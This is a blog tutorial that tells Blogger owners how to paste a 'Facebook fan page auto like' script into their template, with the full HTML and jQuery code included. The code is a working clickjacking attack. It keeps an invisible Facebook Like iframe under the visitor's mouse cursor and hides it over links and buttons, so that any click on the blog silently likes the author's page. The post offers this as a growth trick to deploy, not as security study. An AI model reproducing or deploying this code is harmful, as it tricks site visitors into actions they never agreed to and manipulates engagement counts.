Facebook Fan Pages is the best way to socialize your Blog, Website and is mainly used for Business purpose all over the world, But these page will only helpful when you have more likes or fans on your page, Which can be done by inviting friends, With your blog or website Or By Buying fans from Face book But today in this tutorial I’m going to show you a trick through which you can easily increase your Facebook Fan Page Likes by using a Script in your Blogger Blog and when someone clicks anywhere on your blog he/she will automatically become the fan of your facebook page. By this script the visitor will not be able to copy text on your Blog.

Facebook Fan Page Auto like Script for Bloggers/Blogspot:

To add this Script in Blogger, follow the steps below,

Step 1) Log in to your Blogger Dashboard.

Step 2) Go to Template.

Step 3) Click "EDIT HTML"

Step 4) Inside "HTML EDITOR", press "CTRL+F" and search </head> tag.

Step 5) Copy the following code below and just paste above </head> tag.

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script><script type='text/javascript'> function ClickJackFbHide(){ jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide(); } function ClickJackFbShow(){ jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show(); }</script>

Step 6) Now again press "CTRL+F" and find </body> tag.

Step 7) Copy the following code and just paste above </body> tag.
<div id='clickjack-button-wrapper-5' style='position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:&apos;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&apos;; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden'> <!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>--><iframe allowTransparency='true' frameborder='0' scrolling='no' src='http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FAwesumTricks&amp%3Blayout=button_count&amp%3Bshow_faces=false&amp%3Bwidth=50&amp%3Baction=like&amp%3Bcolorscheme=light&amp%3Bheight=21' style='border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;'/></div> <script type='text/javascript'> jQuery( document ).ready( function() { $( &quot;#clickjack-button-wrapper-5&quot; ).parent().mousemove( function( e ) { jQuery( &quot;#clickjack-button-wrapper-5&quot; ).css( { top: e.pageY - 10, left: e.pageX + 30 } ); } ); clickjack_hider(); var clickjack_fb_timer = setTimeout(&quot;clickjack_hider()&quot;,5000); } ); function clickjack_hider(){ jQuery(&quot;input&quot;).mouseout(function(){ClickJackFbShow();}); jQuery(&quot;a&quot;).mouseout(function(){ClickJackFbShow();}); jQuery(&quot;button&quot;).mouseout(function(){ClickJackFbShow();}); jQuery(&quot;textarea&quot;).mouseout(function(){ClickJackFbShow();}); jQuery(&quot;.ratingblock&quot;).mouseout(function(){ClickJackFbShow();}); jQuery(&quot;object&quot;).mouseout(function(){ClickJackFbShow();}); jQuery(&quot;input&quot;).mouseover(function(){ClickJackFbHide();}); jQuery(&quot;a&quot;).mouseover(function(){ClickJackFbHide();}); jQuery(&quot;button&quot;).mouseover(function(){ClickJackFbHide();}); jQuery(&quot;textarea&quot;).mouseover(function(){ClickJackFbHide();}); jQuery(&quot;.ratingblock&quot;).mouseover(function(){ClickJackFbHide();}); jQuery(&quot;object&quot;).mouseover(function(){ClickJackFbHide();}); }</script>

Step 8) Replace "AwesumTricks" with your own Facebook Fanpage Username.

Step 9) Click "Save Template" and Its done.

Post a Comment Blogger

 
Top